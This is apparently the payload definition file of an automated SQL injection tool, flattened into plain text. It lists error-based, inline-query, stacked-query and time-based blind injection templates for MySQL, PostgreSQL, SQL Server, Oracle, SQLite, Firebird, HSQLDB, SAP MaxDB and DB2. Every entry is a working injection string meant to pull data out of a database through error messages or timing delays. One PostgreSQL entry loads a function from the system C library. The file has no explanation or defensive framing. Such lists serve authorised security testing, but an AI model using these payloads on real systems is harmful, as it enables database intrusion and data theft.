PostgreSQL error-based - Parameter replace 2 3 0 1,2,3 3 (CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)) (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
PostgreSQL
Microsoft SQL Server/Sybase error-based - Parameter replace 2 3 0 1,3 3 (CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))) (CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server Sybase Windows
Microsoft SQL Server/Sybase error-based - Parameter replace (integer column) 2 4 0 1,3 3 (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]') (SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]') [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server Sybase Windows
Oracle error-based - Parameter replace 2 3 0 1,3 3 (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle
Firebird error-based - Parameter replace 2 4 0 1,3 3 (SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')) (SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Firebird
MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses 2 3 0 2,3 1 ,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) ,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 5.0
MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE) 2 3 0 2,3 1 ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 5.1
MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML) 2 4 0 2,3 1 ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]) ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 5.1
PostgreSQL error-based - GROUP BY and ORDER BY clauses 2 3 0 2,3 1 ,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)) ,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
PostgreSQL
Microsoft SQL Server/Sybase error-based - ORDER BY clause 2 3 0 3 1 ,(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))) ,(CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server Sybase Windows
Oracle error-based - GROUP BY and ORDER BY clauses 2 3 0 2,3 1 ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle
MySQL inline queries 6 1 1 1,2,3,8 3 (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL
PostgreSQL inline queries 6 1 1 1,2,3,8 3 (SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]') (SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]') [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
PostgreSQL
Microsoft SQL Server/Sybase inline queries 6 1 1 1,2,3,8 3 (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]') (SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]') [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server Sybase Windows
Oracle inline queries 6 1 1 1,2,3,8 3 (SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL) (SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]' FROM DUAL) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle
SQLite inline queries 6 1 1 1,2,3,8 3 SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))||'[DELIMITER_STOP]' [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
SQLite
Firebird inline queries 6 2 1 1,2,3,8 3 SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Firebird
MySQL > 5.0.11 stacked queries 4 1 0 0 1 ; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) ; SELECT SLEEP([SLEEPTIME]) --
MySQL > 5.0.11
MySQL < 5.0.12 stacked queries (heavy query) 4 2 2 0 1 ; SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) ; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) --
MySQL
PostgreSQL > 8.1 stacked queries 4 1 0 0 1 ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) ; SELECT PG_SLEEP([SLEEPTIME]) --
PostgreSQL > 8.1
PostgreSQL stacked queries (heavy query) 4 2 2 0 1 ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) ; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000) --
PostgreSQL
PostgreSQL < 8.2 stacked queries (Glibc) 4 4 0 0 1 ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) ; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]) --
PostgreSQL < 8.2 Linux
Microsoft SQL Server/Sybase stacked queries 4 1 0 0 1 ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' ; WAITFOR DELAY '0:0:[SLEEPTIME]' --
Microsoft SQL Server Sybase Windows
Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE) 4 5 0 0 1 ; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL ; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL --
Oracle
Oracle stacked queries (heavy query) 4 5 2 0 1 ; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL ; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5 --
Oracle
Oracle stacked queries (DBMS_LOCK.SLEEP) 4 5 0 0 1 ; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END ; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END --
Oracle
Oracle stacked queries (USER_LOCK.SLEEP) 4 5 0 0 1 ; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END ; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END --
Oracle
SQLite > 2.0 stacked queries (heavy query) 4 3 2 0 1 ; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) ; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) --
SQLite > 2.0
Firebird stacked queries (heavy query) 4 3 2 0 1 ; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE ; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4 --
Firebird >= 2.0
HSQLDB >= 1.7.2 stacked queries 4 3 0 0 1 ;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) END ;CALL REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) --
HSQLDB >= 1.7.2
HSQLDB >= 2.0 stacked queries 4 4 0 0 1 ;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) END ;CALL REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) --
HSQLDB >= 2.0
MySQL > 5.0.11 AND time-based blind 5 1 1 1,2,3 1 AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) AND SLEEP([SLEEPTIME])
MySQL > 5.0.11
MySQL > 5.0.11 AND time-based blind (comment) 5 4 1 1,2,3 1 AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) AND SLEEP([SLEEPTIME]) #
MySQL > 5.0.11
MySQL < 5.0.12 AND time-based blind (heavy query) 5 2 2 1,2,3 1 AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))
MySQL
MySQL < 5.0.12 AND time-based blind (heavy query - comment) 5 5 2 1,2,3 1 AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) #
MySQL
PostgreSQL > 8.1 AND time-based blind 5 1 1 1,2,3 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
PostgreSQL > 8.1
PostgreSQL > 8.1 AND time-based blind (comment) 5 5 1 1,2,3 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) --
PostgreSQL > 8.1
PostgreSQL AND time-based blind (heavy query) 5 3 2 1,2,3 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
PostgreSQL
PostgreSQL AND time-based blind (heavy query - comment) 5 5 2 1,2,3 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) --
PostgreSQL
Microsoft SQL Server/Sybase time-based blind 5 1 0 0 1 IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' WAITFOR DELAY '0:0:[SLEEPTIME]' --
Microsoft SQL Server Sybase Windows
Microsoft SQL Server/Sybase AND time-based blind (heavy query) 5 2 2 1,2,3 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
Microsoft SQL Server Sybase Windows
Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment) 5 5 2 1,2,3 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) --
Microsoft SQL Server Sybase Windows
Oracle AND time-based blind 5 1 1 1,2,3 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
Oracle
Oracle AND time-based blind (comment) 5 5 1 1,2,3 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) --
Oracle
Oracle AND time-based blind (heavy query) 5 2 2 1,2,3 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
Oracle
Oracle AND time-based blind (heavy query - comment) 5 5 2 1,2,3 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) --
Oracle
SQLite > 2.0 AND time-based blind (heavy query) 5 3 2 1 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
SQLite > 2.0
SQLite > 2.0 AND time-based blind (heavy query - comment) 5 5 2 1 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) --
SQLite > 2.0
Firebird AND time-based blind (heavy query) 5 4 2 1 1 AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
Firebird >= 2.0
Firebird AND time-based blind (heavy query - comment) 5 5 2 1 1 AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) --
Firebird >= 2.0
SAP MaxDB AND time-based blind (heavy query) 5 3 2 1,2,3 1 AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
SAP MaxDB
SAP MaxDB AND time-based blind (heavy query - comment) 5 5 2 1,2,3 1 AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) --
SAP MaxDB
IBM DB2 AND time-based blind (heavy query) 5 3 2 1,2,3 1 AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
IBM DB2
IBM DB2 AND time-based blind (heavy query - comment) 5 5 2 1,2,3 1 AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) --
IBM DB2
HSQLDB >= 1.7.2 AND time-based blind (heavy query) 5 4 2 1,2,3 1 AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END AND '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)
HSQLDB >= 1.7.2
HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment) 5 5 2 1,2,3 1 AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END AND '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) --
HSQLDB >= 1.7.2
HSQLDB > 2.0 AND time-based blind (heavy query) 5 4 2 1,2,3 1 AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)
HSQLDB > 2.0
HSQLDB > 2.0 AND time-based blind (heavy query - comment) 5 5 2 1,2,3 1 AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) --
HSQLDB > 2.0
MySQL > 5.0.11 OR time-based blind 5 2 3 1,2,3 2 OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) OR [RANDNUM]=SLEEP([SLEEPTIME])
MySQL > 5.0.11
MySQL < 5.0.12 OR time-based blind (heavy query) 5 4 3 1,2,3 2 OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))
MySQL
PostgreSQL > 8.1 OR time-based blind 5 3 3 1,2,3 2 OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
PostgreSQL > 8.1
PostgreSQL OR time-based blind (heavy query) 5 4 3 1,2,3 2 OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
PostgreSQL
Microsoft SQL Server/Sybase OR time-based blind (heavy query) 5 3 3 1,2,3 2 OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
Microsoft SQL Server Sybase Windows
Oracle OR time-based blind 5 3 3 1,2,3 2 OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
Oracle
Oracle OR time-based blind (heavy query) 5 4 3 1,2,3 2 OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
Oracle
SQLite > 2.0 OR time-based blind (heavy query) 5 4 3 1 2 OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
SQLite > 2.0
Firebird OR time-based blind (heavy query) 5 5 3 1 2 OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
Firebird >= 2.0
SAP MaxDB OR time-based blind (heavy query - comment) 5 4 3 1,2,3 2 OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
SAP MaxDB
IBM DB2 OR time-based blind (heavy query) 5 4 3 1,2,3 2 OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
IBM DB2
HSQLDB >= 1.7.2 OR time-based blind (heavy query) 5 4 2 1,2,3 1 OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END OR '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)
HSQLDB >= 1.7.2
HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment) 5 5 2 1,2,3 1 OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END OR '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) --
HSQLDB >= 1.7.2
HSQLDB > 2.0 OR time-based blind (heavy query) 5 4 2 1,2,3 1 OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)
HSQLDB > 2.0
HSQLDB > 2.0 OR time-based blind (heavy query - comment) 5 5 2 1,2,3 1 OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) --
HSQLDB > 2.0
